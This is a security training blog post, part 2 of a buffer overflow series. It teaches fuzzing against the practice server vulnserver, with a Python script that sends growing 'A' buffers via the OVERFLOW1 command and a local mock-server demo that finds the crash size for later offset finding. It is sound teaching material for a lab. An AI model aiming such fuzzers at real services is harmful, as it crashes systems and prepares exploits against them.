
Buffer overflow Beginner To Advance Part 2 - Securium Solutions

Greetings everyone! Today we will learn how to perform fuzzing. In our previous blog we discussed the basic structure of a buffer overflow; in this blog we start with fuzzing, using a suitable example.

What is Fuzzing?

Fuzzing, as used here, is an automated script that continuously sends ever-larger blocks of bytes to the vulnerable application in order to check whether the application is vulnerable to a buffer overflow or not.

Vulnserver is running on port number 9999.

Python Code For Fuzzing :-

    #!/usr/bin/python
    import socket, time, sys

    ip = "172.16.0.10"
    port = 9999
    timeout = 5

    # Build 30 payloads of growing size: 100, 200, ... 3000 bytes
    buffer = []
    counter = 100
    while len(buffer) < 30:
        buffer.append("A" * counter)
        counter += 100

    for string in buffer:
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.settimeout(timeout)
            s.connect((ip, port))
            s.recv(1024)  # read the banner
            print("Fuzzing with %s bytes" % len(string))
            # command, payload and CRLF terminator are sent as bytes
            s.send(("OVERFLOW1 " + string + "\r\n").encode())
            s.recv(1024)  # wait for the reply; a timeout here means the target stopped answering
            s.close()
        except socket.error:
            print("Could not connect to " + ip + ":" + str(port))
            sys.exit(0)
        time.sleep(1)

As shown above, we run the script and it starts sending packets continuously towards vulnserver. Here we observe that the script stopped at 2000 bytes, because vulnserver stopped responding.
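To make the "script stops where the target stops answering" observation reproducible offline, here is an added example (not the post's code and not vulnserver itself): a constructed loopback stand-in that greets the client, answers "OK", and goes silent once the argument reaches 2000 bytes (a threshold chosen only to mirror the post's screenshot), plus a size-stepping fuzzer that records the last size answered and the first size that failed, distinguishing a dropped connection from a timeout and a refused connection. The command prefix OVERFLOW1, the 100-byte step and the 30 rounds are taken from the post; everything else is an assumption of this example.

```python
#!/usr/bin/env python3
"""Size-stepping fuzzer run against a constructed local stand-in for the target."""
import socket
import threading

# Constructed stand-in for the target: it greets the client, reads one command and
# answers "OK", but once the argument reaches CRASH_AT bytes it closes the listener
# and never replies, mimicking the service going silent at 2000 bytes as in the post.
CRASH_AT = 2000  # assumption: picked to mirror the post's observation, not a real constant


def _serve(listener):
    """Accept connections until the simulated crash, then stop listening."""
    while True:
        conn, _ = listener.accept()
        with conn:
            conn.sendall(b"Welcome to the mock server\r\n")
            data = b""
            while not data.endswith(b"\r\n"):  # read one CRLF-terminated command
                chunk = conn.recv(4096)
                if not chunk:
                    break
                data += chunk
            argument = data.split(b" ", 1)[1] if b" " in data else b""
            if len(argument.rstrip(b"\r\n")) >= CRASH_AT:
                listener.close()  # simulated crash: connection dropped, no reply
                return
            conn.sendall(b"OK\r\n")


def start_mock_server():
    """Bind the stand-in on an ephemeral loopback port and return that port."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(5)
    threading.Thread(target=_serve, args=(listener,), daemon=True).start()
    return listener.getsockname()[1]


def fuzz(ip, port, prefix=b"OVERFLOW1 ", step=100, max_rounds=30, timeout=2.0):
    """Send prefix + 'A' * n for n = step, 2*step, ... and stop at the first failure.

    Returns (last_size_answered, first_size_failing, reason); first_size_failing
    is None when every round was answered.
    """
    last_ok = 0
    for n in range(step, step * max_rounds + 1, step):
        payload = b"A" * n
        try:
            with socket.create_connection((ip, port), timeout=timeout) as s:
                s.recv(1024)  # banner
                s.sendall(prefix + payload + b"\r\n")
                reply = s.recv(1024)
            if not reply:
                return last_ok, n, "connection closed without a reply"
            last_ok = n
        except socket.timeout:
            return last_ok, n, "no response within %.1fs" % timeout
        except OSError as exc:
            return last_ok, n, "connection failed: %s" % exc
    return last_ok, None, "no failure observed"


def run_demo():
    """Fuzz the local stand-in and return (last_ok, first_bad, reason)."""
    port = start_mock_server()
    return fuzz("127.0.0.1", port)


if __name__ == "__main__":
    last_ok, first_bad, reason = run_demo()
    print("last size answered: %d bytes" % last_ok)
    print("first size failing: %s bytes (%s)" % (first_bad, reason))
```

Against the stand-in the fuzzer reports 1900 bytes as the last answered size and 2000 as the first failing one, which is the number you would then carry into the next step (pattern creation and offset finding). The three failure reasons matter in practice: a closed connection or a timeout points at the request just sent, while "connection failed" on a later round usually means the process is already gone and the interesting size was the previous one.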

Below I attached both screenshots: one of the script output and the second of the vulnserver status.

FUZZING

In the second screenshot the application is paused, since our vulnerable software is running inside Immunity Debugger.

From Immunity Debugger

In the above example scenario we discussed how fuzzing works and how we can determine, with a Python script, the buffer size at which the application stops responding.

In this fuzzing section we learned how to write the script and perform fuzzing on an application to find the buffer overflow vulnerability.

Thanks for reading... See you in another blog!


Author

Shubham Jaiswal

WEB VAPT (Intern)
